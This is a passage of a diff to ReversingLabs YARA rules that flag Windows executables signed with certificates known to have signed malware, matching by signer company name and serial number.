-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16356-L16374"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10480-L10496"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced"
+		logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28829,21 +51223,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CodeDance Ltd" and ( pe.signatures [ i ] . serial == "00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures [ i ] . serial == "ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" ) and 1654646400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116"
+		id = "b025fe73-89fa-55f2-8b3a-cb46251669e6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16376-L16394"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10498-L10514"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289"
+		logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28853,21 +51247,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA L LIMITED" and ( pe.signatures [ i ] . serial == "00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures [ i ] . serial == "aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" ) and 1549324800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d748bea4-8d2b-53b2-8184-ea0972ad9199"
+		id = "3f5eee11-4106-5923-9563-84f81199bea0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16396-L16414"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10516-L10532"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b"
+		logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28877,21 +51271,21 @@ rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE COMPANY OF WORDS LTD" and ( pe.signatures [ i ] . serial == "00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures [ i ] . serial == "c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" ) and 1549324800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0389d5ba-4535-5277-9c77-bd178e66417f"
+		id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16416-L16434"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10534-L10550"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c"
+		logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28901,21 +51295,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and ( pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures [ i ] . serial == "ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" ) and 1554940800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "308a73cd-a142-56ad-8dca-808ab455b43e"
+		id = "2b177573-8b9f-538f-8d07-b7baede1148d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16436-L16454"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10552-L10568"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e"
+		logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28925,21 +51319,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" ) and 1650931200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rebound Infotech Limited" and pe.signatures [ i ] . serial == "0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f9fa6c6-372d-5948-94ba-9e3fee956647"
+		id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16456-L16472"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10570-L10586"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737"
+		logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28949,21 +51343,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Walden Intertech Inc." and pe.signatures [ i ] . serial == "05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31"
+		id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16474-L16490"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10588-L10604"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6"
+		logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28973,21 +51367,21 @@ rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Emurasoft, Inc." and pe.signatures [ i ] . serial == "2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0"
+		id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16492-L16508"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10606-L10622"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f"
+		logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28997,21 +51391,21 @@ rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Theravada Solutions Ltd" and pe.signatures [ i ] . serial == "02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enforcer Srl" and pe.signatures [ i ] . serial == "30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64350364-fe74-54df-886d-1197146e00e7"
+		id = "ab274ae3-0884-517a-a221-2c952fc9d74c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16510-L16526"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10624-L10642"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c"
+		logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29021,21 +51415,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERIFIED SOFTWARE LLC" and ( pe.signatures [ i ] . serial == "00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures [ i ] . serial == "b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" ) and 1595462400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c"
+		id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16528-L16544"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10644-L10660"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c"
+		logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29045,21 +51439,21 @@ rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROSSO INDEX K.K." and pe.signatures [ i ] . serial == "01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aeb10a64-633c-5fc6-87af-360e1a402ad4"
+		id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16546-L16562"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10662-L10678"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d"
+		logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29069,21 +51463,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d"
+		id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16564-L16580"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10680-L10696"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311"
+		logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29093,21 +51487,21 @@ rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures [ i ] . serial == "1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66025c6e-5d85-5660-87f1-3094a536bbe2"
+		id = "d873b0d4-dff5-5ee2-a70f-b067602b217e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16582-L16598"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10698-L10714"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32"
+		logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29117,21 +51511,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1"
+		id = "44c878ab-75b2-5cd3-a019-94982a508e0f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16600-L16616"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10716-L10732"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2"
+		logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29141,21 +51535,21 @@ rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
 		importance = 25
 
 	condition:
